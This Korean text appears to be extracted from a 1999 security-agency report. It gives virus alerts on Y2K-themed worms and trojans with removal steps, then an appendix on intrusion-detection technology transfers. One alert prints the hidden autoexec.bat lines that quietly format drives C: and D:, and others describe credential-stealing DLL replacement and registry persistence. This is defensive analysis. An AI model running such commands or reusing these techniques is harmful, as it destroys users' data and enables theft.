$dll 파일들을 WINDOWS\SYSTEM 디렉토리에생성시킨뒤 SYSTEM.INI 파일의부트드라이버를지정하는 "Drivers = " 라인에 ntsvsrv.dll을추가시킨다. 또한 WSOCK32.DLL을 PROCLIB16.DLL 파일내용으로덮어씌우고, WSOCK32.DLL 파일은 NLHVLD.DLL란이름으로보관하게된다. PROCLIB16.DLL은 WSOCK32.$

288 사용자가메일에첨부된 Y2KCOUNT.EXE" 파일을실행시키면이파일은 Self -Extracting 파일이기때문에 WinZip 자동압축해제창이나오면서다음과같은가짜 Error메시지창이뜨게된다. 이바이러스가실행되면 Proclib.exe, Proclib.dll, Proclib16.dll, ntsvsrv.dll 파일들을 WINDOWS\SYSTEM 디렉토리에생성시킨뒤 SYSTEM.INI 파일의부트드라이버를지정하는 "Drivers = " 라인에 ntsvsrv.dll을추가시킨다. 또한 WSOCK32.DLL을 PROCLIB16.DLL 파일내용으로덮어씌우고, WSOCK32.DLL 파일은 NLHVLD.DLL란이름으로보관하게된다. PROCLIB16.DLL은 WSOCK32.DLL의기능을모방하며사용자가인터넷과네트워크를통한작업을할때관련된사용자정보 (login 이름, 패스워드, 사용자이름 ) 들을찾아내어이정보를바이러스제작자에게보낸다

289 이바이러스는 Melissa 바이러스와유사하게사용자의주소록에등록된주소들에모두 Y2K 메일을보내는방식으로자신을전파시킨다.(Outlook Express의경우 ) 3. 예방및치료방법 o Y2K 바이러스예방법사용자들이 Y2K 바이러스에대한충분한인식만가지게된다면간단히예방할수있을것이다. "Y2KCOUNT.EXE" 파일이첨부된제목이 Microsoft Announcement인메일을받게되면삭제하는방법을사용한다. o Y2K 바이러스제거방법 1 다음과같은 WINDOWS\SYSTEM.INI 파일의 "driver = " 라인에서 ntsvsrv.dll" 파일을삭제한다. 2 시스템을재부팅한후 internet 관련어플리케이션을실행시키지않은상태 ( 변경된 WSOCK32.DLL을메모리에올리지않기위함 ) 에서 Y2K 바이러스에의해변경된 WINDOWS\SYSTEM\Nlhvld.dll 파일을 WINDOWS\SYSTEM\WSOCK32.DLL로복사한다.( 만일여기서 Error가발생되면 WSOCK32.DLL이이미메모리에올라간것을의미하므로모든 Internet과 Network관련프로그램을종료시키거나 floppy disk로재부팅후 DOS 모드에서다시복사를시도해야함 ) 3 WINDOWS\SYSTEM 아래의다음파일들을삭제한다

290 "BobbleBoy 컴퓨터바이러스긴급경보 " 1. 개요최근 "BubbleBoy" 라는기존의첨부파일을통해전파되는웜과달리첨부파일이존재하지않고 을읽는것만으로도시스템이감염되는최초의 E-mai1 웜이출현하여이러한새로운형태의바이러스에대한주의가요구된다. 이바이러스의제작자는 ActiveX를제대로제어하지못하는 Microsoft Internet Explore 5의보안취약점 (scriptlet.typelib/ Eyedog) 을이용하여첨부파일의실행없이도확산이가능한이러한바이러스를제작하였으며, 제작자는이바이러스를연구의목적으로제작한것이라고밝히고있다. "BubbleBoy" 는환경과프로그램에많이영향을받기때문에국내에서의확산피해는아직접수되지않고있다. 이바이러스는사용자가 Internet Explorer 5와 VB Script를실행시킬수시스템, Outlook을이용할경우에만정상적으로동작한다. 그리고영문윈도우와스페인윈도우에서만동작하며, 한글윈도우에서는동작하지않는다. 그러나이미바이러스제작자에의해소스가인터넷에공개되었으므로이를이용한새로운변종바이러스등장의가능성이있어주의가요구된다. 2. 바이러스감염증상이바이러스를전파시키는 E-Mai1은다음과같은내용으로구성되어있다. 이바이러스는연구용으로만들어졌기때문에특별한시스템파괴의증상은나타나지않고있다. Outlook과 Outlook Express에서이웜에감염된메일을읽게되면아래의그림이나타나면서 C:\WINDOWS\START MENU\PROGRAM\STARTUP 폴더에 UPDATE.HTA 파일이생성한다

STARTUP에등록되었기때문에시스템을재부팅을하면아래메시지가나타나면서주소록에존재하는모든사람에게자신을전파하게되는데 Outlook에서만동작되며 Outlook Express 사용자의경우주소록을통해사람들에게메일을보내지는않는다. System error, delete "UPDATE.

291 STARTUP에등록되었기때문에시스템을재부팅을하면아래메시지가나타나면서주소록에존재하는모든사람에게자신을전파하게되는데 Outlook에서만동작되며 Outlook Express 사용자의경우주소록을통해사람들에게메일을보내지는않는다. System error, delete "UPDATE.HTA" from the startup folder to solve this problem. 3. 예방및치료방법 o BubbleBoy 바이러스인식사용자들이 BubbleBoy 바이러스에대한충분한인식만가지게된다면충분히확산을막을수있을것이다. 제목이 BubbleBoy is back! 인메일을받게되면읽기전에삭제한다. o Microsoft의 Patch 설치사용자가 Internet Explore 5을사용할경우이바이러스의대응을위해 Microsoft에서발표한 scriptlet.typelib/eyedog" Patch를설치하여이바이러스의확산을막는다

292 "W32/Fix(Fix2001) 컴퓨터바이러스긴급경보 " (Y2K 해결프로그램가장바이러스 ) 1. 개요 11월 24일 ( 수 ) 한국정보보호센터바이러스신고센터 (virus-rep@certcc.or.kr) 로 Y2K 문제해결을가장한웜바이러스형태인 "W32/Fix" 가신고되어 25일 ( 목 ) 백신업체및관련기관에샘플을배포하였다. 26일 ( 금 ) 에백신업체들에의해탐지및치료백신이개발되었다. 현재까지바이러스신고센터로접수된건수는 3건으로계속적으로피해가증가하고있어사용자들의주의가요구된다. 2. 감염특성 MS에서보낸 Y2K 문제를해결해주는패치인것처럼가장한바이러스프로그램이첨부된 E 메일을통하여전파된다. 3. 피해증상첨부된파일이실행되면 C:\Windows\System 디렉토리에파일을복사하고사용자들의 registry key를변화시켜서 Mail Script 설정변경. 송신측 E-메일에바이러스파일인 Y2K Internet bug fix를첨부하여바이러스유포, 이웜바이러스의 body string이다른파일과충돌되거나 overwrite가가능하기때문에매우위험하며, 이런경우 C:\COMMAND.COM 파일이트로이목마파일로 overwrite 되면서다음부팅시에디스크의데이터를삭제한다. 4. 예방및조치 Fix2001" 이란첨부파일이포함된 E메일을수신시해당첨부파일을수행하지말고, 해당메시지를삭제한다. 감염된경우, 최신백신 SW를다운받아치료한다

293 "W32/MyPics 컴퓨터바이러스긴급경보 " 1. 긴급 2000년 1월 3일 W32/MyPics 웜바이러스가국내에전파되어급속히확산되고있습니다. 이바이러스는시스템을파괴하는매우악성인바이러스이므로사용자들의주의가요구됩니다. 이미백신이개발되어있으므로백신을이용하여시스템을점검해보시고, 감염되었다면재부팅을하지마시기바랍니다. 치료한다음에플로피를통해부팅해야만포맷되는피해를막을수있습니다. 이미피해를입은경우는복구센터를통해복구할수있으므로하드디스크를건드리지말고데이터복구업체를통해피해 HDD를복구하시기바랍니다. 2. 바이러스개요최근 Y2K관련바이러스유형중의하나 (Y2K 문제가상 Simulation 바이러스 ) 인 "W32/MyPics" 라는웜바이러스가출현하여사용자들의주의가요구되고있다. Y2K 전환기간이다가옴에따라 Y2K와관련된가장바이러스들이계속적으로증가할것으로예상된다. "W32/MyPics" 는기존의웜바이러스의유형과같이감염된시스템의 OUTLOOK 주소록을참조하여 50명의사용자들에게감염파일이첨부된 을자체적으로전파하는방법으로전파된다. 이바이러스의감염특성은사용자가첨부된 "PICS4YOU.EXE" 라는감염파일을실행시키면, 재부팅시마치 Y2K 문제발생을나타내는것같이 CMOS Checksum Invalid" 라는메시지를화면에출력하여 Y2K 문제를 Simulation한다. 그리고 autoexec.bat 파일을수정하여시스템의하드디스크드라이브를포맷하게되어사용자가 Y2K문제로인한시스템파괴로오인하게만드는바이러스이다. 관련기사 [ 동아일보 ]Y2K 보다 'Y2K바이러스' 기승ㆍㆍㆍ5가지발견비상 ( ) [ 한국경제 ] 밀레니엄바이러스 ' 비상 '.. 연말연시잇단등장 ( )

294 3. 감염특성아래의그림과같이전파되는 E-mai1의 SUBJECT는없으며, Body부분에 Here's some pictures for you 라는문구와함께바이러스가감염된파일이첨부되어있다. 이바이러스는두가지의피해증상으로나누어볼수있다. 첫째증상은첨부파일이실행하게되면재부팅시 (2000년 1월 1일이지난시점에서 ), CMOS Checksum Invalid" 라는메시지를출력하며부팅이불가능하게만든다. 하지만이런현상은 CMOS 설정에서쉽게수정하여부팅이가능하게할수있다. 이렇게부팅이되면두번째증상으로변경된 autoexec.bat파일이실행되어시스템이완전히파괴된다. 이바이러스의기술적인활동방법을자세히살펴보면다음과같다. "PICS4YOU.EXE" 파일을실행하게되면, OUTLOOK의주소록을참조하여 50명의사용자에게 "PICS4YOU.EXE" 파일이감염된 E-mai1을자동적으로보낸다. 이웜바이러스는특징적으로 Microsoft Internet Explorer 브라우저의 "Home Page" 설정을다음 URL 로바꾼다. 또한이웜바이러스는메모리에상주하며, 시스템시간을모니터링하여 2000년 1월 1일이되면 CBIOS.COM이라는파일을시스템에만들고실행시킨다

295 그리고 autoexec.bat 파일을다음과같은내용으로바꾼다. ctty nul format d:/autotest /q /u format c:/autotest /q /u 시스템이재부팅되면다음과같은시스템 BIOS 오류메시지를화면에출력한다. "CMOS Checksum Invalid" 시스템 BIOS 설정을수정하여이러한문제를없애고재부팅하게되면 autoexec.bat가실행되어시스템의데이터를완전히삭제한다. 4. 예방법 o W32/MyPics 바이러스인식사용자들이 W32/MyPics 바이러스에대한충분한인식만가지게된다면충분히확산을막을수있을것이다. 제목이없고, Text 메시지가 Here's some pictures for you" 이며, 첨부파일이 "PICS4YOU.EXE" 인 E-mai1을받게되면첨부파일을실행하지마시고삭제하거나메일을 virus-rep@certcc.or.kr로 Forward해주시기바랍니다. 5. 치료방법 최신백신프로그램으로치료하는방법 수동으로치료하는방법 1 Ctrl-Alt-Del Key를눌러서시스템테스크 / 프로세서에서 MYPICS 프로세서를종료시킵니다. 2 레지스트리편집기를사용하여다음레지스트리정보를삭제한다. HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run=C:\Pics4 You.Exe 3 만일시스템의날짜가 2000년이라면 autoexec.bat 파일이수정되었는지를확인하여수정되었다면백업된파일로대체한다. 4 시스템에 CBIOS.COM 파일이존재를확인하여존재하면파일을삭제한다

296 5 윈도우시스템의 Start 메뉴에서찾기 ( 파일또는폴더 ) 를선택하여 Pics4you.exe 이름의프로그램을찾아삭제한다. 6 이바이러스는 MicroSoft Internet Explorer 브라우저의 Home Page를변경하므로원래의페이지로대체한다

297 "W95/Babylonia 컴퓨터바이러스긴급경보 " ( 스스로업데이트하는컴퓨터바이러스 ) 1. 개요최근 Y2K관련바이러스의유형 ( 응용프로그램의 Y2K문제해결가장프로그램 ) 과자체적인업데이트기능을포함한신종바이러스인 W95/Babylonia" 라는웜바이러스가출현하여사용자들의주의가요구되고있다. Y2K전환기간이다가옴에따라 Y2K와관련된가장바이러스들이계속적으로증가할것으로예상된다. 이바이러스는최근새로운웜전파방법인 mirc의 DCC 스크립트를이용한응용프로그램의 Y2K 문제해결프로그램을가장한 "2KBug-MircFix.exe" 라는파일을통하여전파된다.(E-메일에의한첨부파일형태의전파기능은포함되지않음 ) "W95/Babylonia" 의새로운특징은자체적인업데이트기능을가지고있다는것으로기존의윈도우트로이목마프로그램들이가지고있던 P1ugin에의한 Component 추가와설정조정기능을포함한다. 이러한유형은최신해킹기법과결합된바이러스라는점에서더많은피해가예상되며많은변종이발생될우려가있다. "W95/Babylonia" 바이러스는 12월 3일에 alt.crackers" 라는뉴스그룹에서발견되어국외에서는벌써백신업체들이이바이러스의위험을경고하고있다. 현재까지국내에서신고된사례가없으나국내에서도 mirc를이용한 IRC의사용이늘어나고있기때문에국내에전파될가능성이높다. mirc등의 IRC 프로그램을사용하는일반사용자들은항상최신의 IRC 프로그램을사용하고, DCC 보안설정에주의하여야할것이다. 관련기사 [ 연합뉴스 ] 업데이트능력갖춘컴퓨터바이러스등장 [12. 8] ' 스스로업데이트 ' 컴퓨터바이러스등장

298 Y2K( 컴퓨터 2000년도인식오류 ) 문제해결프로그램으로위장했을뿐만아니라스스로업데이트할수있는능력까지갖춘신종컴퓨터바이러스가등장했다고미국의소프트웨어전문가들이 7일경고했다. 미국트렌드마이크로사 ( 社 ) 의데이비드페리대중교육담당이사는 주로인터넷채팅프로그램을통해전파되는 W95.BABYLONIA 바이러스가 6일새로발견됐다 " 면서 "Y2K 해결프로그램으로위장하고있어이를다운로드받을경우시스템전체가바이러스에감염된다 " 고말했다. 그는일단이바이러스에감염되면윈도체제상의모든파일들이파괴된다고설명했다. 페리이사는특히이바이러스는인터넷을통해프로그램을다운로드받아스스로를업데이트하는능력을갖고있어 바이러스유포자가필요하다면언제든지인터넷을통해지시를내려감염된컴퓨터를통제할수있다 고강조했다. 이바이러스는컴퓨터부팅시 W/95/Babylonia by Vecna (c) 1999, Greetz to RoadKil and VirusBuster...Eu boto fogo na babilonia" 라는긴메시지를보내고감염된컴퓨터의숫자파악을위해감염된시스템에지시를내려 babylonia-counterahotmail.com" 이란주소로 e-메일을보내게한다. 소프트웨어업체인시맨텍은 7일현재 20명의고객이이바이러스관련해회사에문의를해왔다고밝혔다. 컴퓨터전문가들은 이바이러스를통해바이러스제조기술이한단계높아졌음을알수있다 면서 감염을예방하려면불필요한파일을다운로드받지말고바이러스탐지프로그램을최신버전으로업데이트시켜야한다 고충고했다. 워싱턴 /AFPㆍAP 연합 > 최종편집 : 1999/12/08 13:09:36 2. 감염특성브라질에서제작된 W95/Babylonia" 바이러스는 "alt.crackers" 라는뉴스그룹에서 1999 년 12월 3일에처음 serialz.zip" 란이름의 help 파일의형태로발견되었다. 이바이러스는윈도우 95/98 시스템의 EXE 파일과 HLP(Help) 파일을감염시킨다

299 이바이러스는 "KERNEL32.EXE" 라는파일을감염시스템에만들고시스템레지스트리를다음과같이변경한다. HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run KERNEL32.EXE="KERNEL32.EXE" 이 KERNEL32.EXE 프로세스는인터넷접속을모니터링하기위해다음과같은 DLL파일들을이용한다. C:\WINDOWS\SYSTEM\WSOCK32.DLL C:\WINDOWS\SYSTEM\WININET.DLL C:\WINDOWS\SYSTEM\SHLWAPI.DLL C:\WINDOWS\SYSTEM\USER32.DLL C:\WINDOWS\SYSTEM\GDI32.DLL C:\WINDOWS\SYSTEM\ADVAPI32.DLL C:\WINDOWS\SYSTEM\KERNEL32.DLL 특징적인감염증상으로는감염된파일들이존재하는코드나데이터를덮어쓰기때문에데이터가손실되게된다. 한예로 MS OUTLOOK이감염된후실행되면다음과같은오류를발생시키게된다. OUTLOOK caused an invalid page fault in module KERNEL32.DLL at 0137:bff9a141. 이바이러스는인터넷접속을모니터링하며, 바이러스제작자그룹에의해운영되는일본웹사이트에이바이러스의다른 component 프로그램 (Plugin) 을다운받기위해접속하게된다. 이렇게설치된 plugin 프로그램은바이러스제작자가계속적으로제작할수있으며필요에따라감염시스템에서실행시킬수있는윈도우트로이목마와같은기능을하게될수도있다. "virus.txt" 라는리스트의모든 component 파일들을다운받게되면이바이러스는자체적으로전파되게된다. 만일감염된시스템에 mirc 프로그램이설치되어있다면, 이바이러스는 "script.ini" 설정파일을수정하고자동적으로 IRC 채널에접속하여그채널에접속된모든사용자들에게 "2KBug-MircFix.exe" 보내게된다

300 또한 "W95/Babylonia" 바이러스는감염된전체시스템의통계적인숫자를파악하기위한목적으로 Wsock2.dll을이용하여감염된시스템이감염되었음을바이러스제작자의 E-메일주소인 바이러스제작자는이렇게보내진메일의헤더를분석하여감염시스템의 IP주소와 Domain등의정보를알아낼수있다. 이컴퓨터바이러스는 AUTOEXEC.BAT 파일에다음내용을삽입하여부팅시메시지를출력하게된다. echo W95/Babylonia by Vecna (c) 1999 echo Greetz to RoadKil and VirusBuster echo Big thankz to sok4ever webmaster echo Abracos pra galera brazuca!!! echo --- echo Eu boto fogo na Babilonia! 3. 예방법 o W95/Babylonia 바이러스예방법최근컴퓨터바이러스예방을위해서는빠르게변하고있는바이러스의유형과기능들에대한정보를빠르게입수하여충분한인식을통하여예방하는것이가장중요할것이다. 그리고최신의 mirc와같은 IRC 클라이언트프로그램의경우이런웜바이러스를막기위한설정이되어있으므로최신의프로그램을사용하여확산을막을수있다. mirc의 auto DCC get 옵션을사용하지않는다. (turn if off)

301 "W32/NewApt 컴퓨터바이러스긴급경보 " 1. 개요최근유명사이트인 messagesmates의새해축하메시지프로그램을가장한 "W32/NewApt" 라는웜바이러스 (Y2K 축하프로그램가장바이러스 ) 가출현하여사용자들의주의가요구되고있다. 이바이러스는첨부파일이름이임의적으로계속변하며, E-메일의메시지도 2가지로이루어져있어사용자들을혼돈시킬수있는메모리상주형웜바이러스이다. 이바이러스에감염되면시스템에는특별한피해증상이없으며단지, 네트워크속도가느려지는것을발견할수있다. 하지만이속도저하는이웜바이러스의숨겨진공격인마이크로소프트로의 ping-bomb" 같은공격과계속적인전화접속에의한네트워크트래픽증가가원인이된것이다. 이웜바이러스의전파방법이외국에서크게인기를끌고있는 messagesmates" 의메시지프로그램을가장한 E-메일을통한전파라는점에서외국 ( 유럽 ) 에서의피해가증가하고있다. 국내에서도 1999년 12월 22일에 Y2K관련바이러스및해킹비상대응상황실로처음신고가접수 (virus-rep@certcc.or.kr) 되었으며, 계속적으로국내에전파되고있는것으로알려져사용자들의주의가요구된다. 2. 감염특성제목이 Just for your eyes 인 E-메일을통해전파되며총크기는 69632바이트이다. E-메일응용프로그램의 html형메일지원여부에따라다음두메시지중하나를 E-메일내용으로보낸다. html을지원하는경우 Hypercool Happy New Year 2000 funny programs and animations

302 We attached our recent animation from this site in our mail! Check it out! html을지원하지않는경우 he, your lame client cant read HTML, haha. click attachment to see some stunningly HOT stuff 전파되는 E-메일은다음의이름의파일들중임의적으로하나의파일이첨부되며이파일들은이름만변경된같은파일들이다. baby.exe,bboy.exe, boss.exe, casper.exe, chestburst.exe, cooler1.exe, cooler3.exe, copier.exe, cupid2.exe, fater.exe, fborfw.exe, goal.exe, goal1.exe, g-zilla.exe, irngiant.exe, hog.exe, monica.exe, panther.exe, panthr.exe, party.exe, pirate.exe, s.exe, saddam.exe, theobbq.exe, video.exe 이첨부프로그램들은전파되는 E-메일에언급한웹사이트주소와전혀상관이없으며, messagemates" 의게임프로그램도아니다. 만일사용자가첨부된웜파일을실행하면, 다음과같은거짓에러메시지창을띄운다. 메시지창의디렉토리이름들의리스트는윈도우 9x의 AUTOEXEC.BAT와 WIN NT에서의제어판을통해시스템환경변수를통해얻어낸다. 여기서메시지의 dinimic 이라는잘못된철자를발견할수있다. 또한감염된시스템이 MS OUTLOOK Express가설치되어있는지를확인하여설치되어있다면 c:/windows 폴더에다음의두파일을생성시킨다

303 mma. - (E-메일주소들의리스트를포함 ) mmail. - (MS OUTLOOK Express의디렉토리를포함 ) 이웜은그후에윈도우폴더에복사되며, 다음윈도우시동시레지스트리를변경하여 chestburst.exe 라는실행파일에 /x옵션을주어파일을로딩한다. 예로, chestburst.exe가실행되면 win 95에서의레지스트리엔트리는다음과같다. HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run tpanew = c:\windows\chestburst.exe /x 다음윈도우시작시이파일은실행되며, 웜이메모리로로딩되면시스템에 tapi32.dll 파일을사용한다. 웜이 win 9x 시스템에서활동하면, 다음의 DLL들이사용되어진다. C:\WINDOWS\SYSTEM\WSOCK32.DLL C:\WINDOWS\SYSTEM\WININET.DLL C:\WINDOWS\SYSTEM\SHLWAPI.DLL C:\WINDOWS\SYSTEM\USER32.DLL C:\WINDOWS\SYSTEM\GDI32.DLL C:\WINDOWS\SYSTEM\ADVAPI32.DLL C:\WINDOWS\SYSTEM\KERNEL32.DLL MS OUTLOOK 같은 E-메일애플리케이션을사용하면추가적으로 TAPI32.DLL이사용된다. 특별한감염증상은 12월 26일 0시부터이웜바이러스는 3초마다마이크로소프트의한원격의컴퓨터로접속을시도한다. 이것은감염된많은시스템으로부터동시에접속이이루어지므로서버에대한 ping-bomb과같은공격이라고할수있다. 또한이웜은카운터와다른조건에따라웜내부의리스트에서선택된전화번호로임의적으로전화접속을시도한다. 3. 예방법

304 o W32/NewApt 바이러스인식사용자들이 W32/NewApt 바이러스에대한충분한인식만가지게된다면충분히확산을막을수있을것이다. 제목이 Just for your eyes" 이고, Text 메시지가 messagesmates" 와관련이있으며, 첨부파일이있는 E-mai1을받게되면첨부파일을실행하지마시고삭제하거나메일을 Forward해주시기바랍니다. 4. 치료방법 최신백신프로그램으로치료하는방법국내백신업체에서이미백신을추가하였으므로, 엔진을 update하여사용하시기바랍니다. 수동으로치료하는방법 ( 임시적인방법 ) 1 레지스트리편집기를사용하여다음레지스트리정보를삭제한다. HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run tpanew = c:\windows\chestburst.exe /x 2 시스템을재부팅시키고, 시스템에로딩되는 DLL파일들을확인한다. 출처 : 출처 :

305 Win95/LOVE 컴퓨터바이러스긴급경보 (CIH 유형의국산바이러스 ) 1. 개요최근 CIH와유사한형태의한국산신종바이러스가확산되고있어사용자들의주의를요구되고있다 ( 수 ) 국내업체들에의하여백신이개발된신종바이러스인 Win95/LOVE는 CIH변종바이러스로서이미 ( 화 ) 부터모 PC통신망 바이러스11 9 게시판에서보고된바있었다. 하지만이바이러스는국외에서도보고된사례가없는한국에서제작된바이러스로국내에서최초로발견되어기존의백신으로는검색ㆍ치료가제대로되지않는상태로국내에많이확산되었을것으로보인다. 2. 감염특성이 Win95/LOVE는 CIH와유사하게메모리에상주하는신종바이러스로서일단시스템이감염되면이후에실행파일 (.EXE) 이실행될때이들을감염시키게된다. 제작지는한국이며, 윈도우 95/98에서동작하고, 윈도우 NT에서는동작하지않는다. 바이러스이름이 LOVE인것은바이러스내부에 "LOVE" 라는문자열이포함되어있기때문이다. 이바이러스는감염시 PC속도가저하되고 2000년 3월 1일이후매월 1일마다작동을개시하여멜로디 (LG 로고음악 ) 소리를내며음악이연주되는동안에는 PC가정지하는등의피해를입히는것으로분석되었다. 하지만지난 4월에발견된 CIH 바이러스처럼시스템파괴등의피해는주지않는것으로나타났다. 3. 예방법이바이러스는현재 PC 통신망이나인터넷에통해많이전파되고있으므로, 인터넷을통해얻은 ( 다운로드, E-메일첨부 ) 파일들에대해서는최신엔진으로업데이트된백신 ( 99년 12월 29일이후 ) 으로점검한뒤실행시켜야한다. 4. 치료방법최신백신프로그램 ( 99년 12월 29일이후엔진 ) 을사용하여치료하는것이가장안전하다

306 부록 J. '99 정보보호관련기술이전현황 J1. 기술이전현황 J2. 이전기술소개

307 부록 J. '99 정보보호관련기술이전현황 J1. 기술이전현황 가. 산업체이전현황 기술명이전시기전수업체 1. 네트워크안전진단기술 - 네트워크를통한해킹취약점진단분석 2. 네트워크보안관리기술 - 네트워크상의모든시스템의종합적인보안관리기술 3. Petri-Net 기반네트워크침입탐지기술 - 네트워크를통한해킹시도를실시간으로탐지 4. BSM 기반시스템침입탐지기술 - 시스템내에서의해킹시도실시간탐지기술 5. 시스템보안취약점자동복구기술 - 분석된해킹취약점자동제거 '99. 9 '99. 9 '99. 9 '99. 9 '99. 9 네트워크안전진단기술및보안관리기술은 '99 추가이전 총 2 개업체 - ( 주 )LG 전자, 마니네트워크 ( 주 ) 총 2 개업체 - ( 주 )LG 전자, 마니네트워크 ( 주 ) 총 9개업체 - 아코테크 ( 주 ), ( 주 ) 케이원시스템, ( 주 ) 소만사, ( 주 ) 나일소프트, LG전자 ( 주 ), 소프트포럼 ( 주 ), 마니네트워크 ( 주 ), 엘지정보통신 ( 주 ), ( 주 ) 와치텍총 7개업체 - ( 주 ) 융시스템, ( 주 ) 나일소프트, LG 전자 ( 주 ), 소프트포럼 ( 주 ), 마니네트워크 ( 주 ), 엘지정보통신 ( 주 ), ( 주 ) 와치텍총 3개업체 - LG전자 ( 주 ), 마니네트워크 ( 주 ), ( 주 ) 와치텍 나. 공공기관및국내무료제공기술 기술명 공개시기 배포대상 1. 패킷모니터링기술 (Moninet) - 네트워크패킷정보모니터링 S/W '99. 9 홈페이지일반공개 2. 네트워크스캔공격탐지기술 (RTSD) - 네트워크를통한시스템보안취약점점검시도자동탐지 S/W ' 정부ㆍ공공기관및일반배포 네트워크스캔공격탐지기술소개제 4장 3절참조

308 J2. 이전기술소개 1. 네트워크기반침입탐지시스템 가. 시스템개요인터넷등네트워크환경에서의불법침입은어떤형태의침입을막론하고정보자산에상당한피해를입히고있다. 이러한침입행위는체계적이고정형화된분석방법에의해불법침입여부를판정하는것이가장효과적인방법임에도불구하고, 지속적인해킹수법의출현과유형의다양화때문에대부분의정보통신망및정보시스템운영기관에서효과적대응을하지못하고있다. 특히거의모든시스템이로그파일을이용하거나, 오프라인 (Off-Line) 으로침입여부를분석하는형태로이루어져, 효과적인사고대응을할수없다. 이러한문제점을해결하기위하여시스템의확장성과정형화된분석방법론적용을고려하여실시간으로침입여부를판정하고, 침입을대응할수있는네트워크기반침입탐지시스템 (OLID, OnLine Intrusion Detector) 을한국정보보호센터에서개발하였다. OLID시스템은비정상적인방법으로네트워크상의정보시스템에대한불법접속, 정보시스템내부에서시도되는침입관련행위, 그리고정상적인네트워크서비스를방해하는침입시도등을네트워크패킷분석을통하여탐지할수있는시스템이다. 그리고네트워크패킷수집과축약 (Reduction) 기술을조합하여수작업을통한개별적인보안관리방식의한계, 기존의정보자산에대한해킹사고대응의확장성과유연성의한계그리고공개네트워크의불법접근통제를위한침입차단시스템상호보완시스템으로활용할수있는시스템이다. (1) 국내외침입탐지시스템기술현황현재침입탐지시스템은탐지영역중심의데이터소스 (Data Source) 기반과탐지방법중심으로크게나눌수있다 ( 표 J-1 참조 )

309 구분 데이터소스기반 침입탐지모델기반 [ 표 J-1] 침입탐지시스템분류 o 단일호스트기반의침입탐지시스템 o 다중호스트기반의침입탐지시스템 o 네트워크기반의침입탐지시스템 세부구분 o 비정상적인탐지모델기반의침입탐지시스템 - 통계적인방법 (Statistical approaches) - 특징추출 (Feature Selection) - 예측가능패턴생성 (Predictive Pattern generation) - 신경망을이용한방법 (The use of Neural Networks) o 오용탐지모델기반의침입탐지시스템 - 전문가시스템 (Expert Systems) - 키입력관찰 (Keystroke monitoring) - 모델에근거한침입탐지 (Model based Intrusion Detection) - 상태전이분석 (State Transition Analysis) 기존의상용제품들의침입탐지기법들대부분은일정한침입형태를가정하고개발되어, 새로운침입패턴의생성에따른적응력과확장성이결여등의문제점을가지고있다. 그러나최근미국을중심으로이러한결점제거와비정상적 (Anomaly) 침입탐지시스템개발을추진하고있다. 침입탐지시스템종류 [ 표 J-2] 침입탐지시스템비교 탐지내용탐지범위탐지방법이상탐지오용멀티호호스트네트워크기스트통계적규칙탐지기반반기반기반 AID v v v ASAX v v v CMDS v v v v v Computer Watch v v v CSM v v DIDS v v EMERALD v v v IDES v v v IDIOT v v v STAT v v v v W&S v v v 상태변이 그리고현재국내에서개발및판매되고있는침입탐지시스템으로는 DJIDS(( 주 ) 대정아이엔씨 ) 1), NeoWather(( 주 ) 인젠 ) 2), Siren(( 주 ) 펜타시큐러티 ) 3) 등의제품이있다. 1) 2) 3)

(2) 개발시스템개요 OLID시스템은네트워크상에서의패킷분석을통하여신속하게불법침입을탐지하고, 효율적으로대응할수있는시스템으로불법침입의실시간탐지와시스템사용의편리성, 침입패턴적용의확장성등을고려하여개발하였다. 개발시스템의주요기능을살펴보면다음과같다.

310 (2) 개발시스템개요 OLID시스템은네트워크상에서의패킷분석을통하여신속하게불법침입을탐지하고, 효율적으로대응할수있는시스템으로불법침입의실시간탐지와시스템사용의편리성, 침입패턴적용의확장성등을고려하여개발하였다. 개발시스템의주요기능을살펴보면다음과같다. 1 침입탐지를위한기본정보를수집하는네트워크패킷수집기능 2 침입판정의효율성을위한패킷필터링, 패킷재구성등의네트워크패킷축약 (Reduction) 기능 3 불법침입행위분석방법론에의한침입행위판정기능 4 보안DB를이용한침입여부판정및침입상황종합관리 GUI 기능 ( 그림 J-1) 네트워크침입탐지시스템개념도

311 나. 시스템구조 (1) 시스템모델 OLID시스템은네트워크를연속적으로모니터링하고, 침입행위를감지하여보고할수있는모듈을설계하였다. ( 그림 J-2) 에서보는바와같이 4개의모듈로구성되어시스템자체에확장성이있으며, HTTP를프로토콜로사용하는 Web서비스를기반으로하는사용자인터페이스를통해침입행위가보고된다. ( 그림 J-2) OLID 시스템구성 1 네트워크패킷수집모듈네트워크패킷수집모듈은네트워크로부터침입탐지를위한초기작업이이루어지는부분으로네트워크기반의침입탐지의기본자료가되는패킷들을수집한다. 주요기능은 LAN환경에서패킷송수신에관련된물리적인장치의유무를확인하고, 장치상태점검과네트워크접속상태확인으로부터기본적인패킷수집장소를확보한후, 확보된네트워크패킷수집장소로부터시스템에접속을시도하는모든네트워크패킷들을읽어들인다. 2 네트워크패킷축약 (Reduction) 모듈실시간침입탐지시스템으로부터침입관련패킷으로규정된탐지대상패킷들과무관한패킷들을제거 (drop) 하고분석처리의효율성을높이기위해서는축약 (reduction) 기능을제공한다

312 Packet filtering( 패킷필터링 ) 기능침입관련패킷만추출하는필터링으로관련없는패킷들에대한침입여부를확인절차를생략하여신속한침입판정에효율성을제공한다. 단순침입탐지 (Simple Intrusion Detection) Source probing, Port probing 등과같은단순한침입패턴에대한침입여부판정을쉽게할수기능을제공한다. 패킷재구성 (Packet Reformatting) 다양한침입패턴을패킷재구성을통해효과적으로침입을판정하는기능을제공한다. 3 침입행위판정모듈패킷축약모듈에서전달된정보는침입가능성이있거나침입관련패킷으로간주되므로침입행위판정모듈에서는패킷헤더의정보 (Packet Header Information), 패킷의교통량측정 (Packet Traffic Monitoring), 패킷의내용분석 (Packet Contents Analysis) 을이용한침입행위분석방법론에의해침입여부를판정한다. 4 침입행위보고모듈침입행위보고모듈은탐지된침입유형이나침입행위의위험정도등을웹을통해시스템관리자에전달하거나, 종합관리할수있도록하는기능을제공한다. 5 보안 DB(Security DataBase) 보안DB는침입행위감시, 침입판정등의침입탐지관련정보를관리하는기능을제공한다. (2) 침입행위분석론 OLID시스템에서효과적인침입탐지를위해 CPN(Colored Petri Nets) 를이용한침입행위분석방법을사용하였다

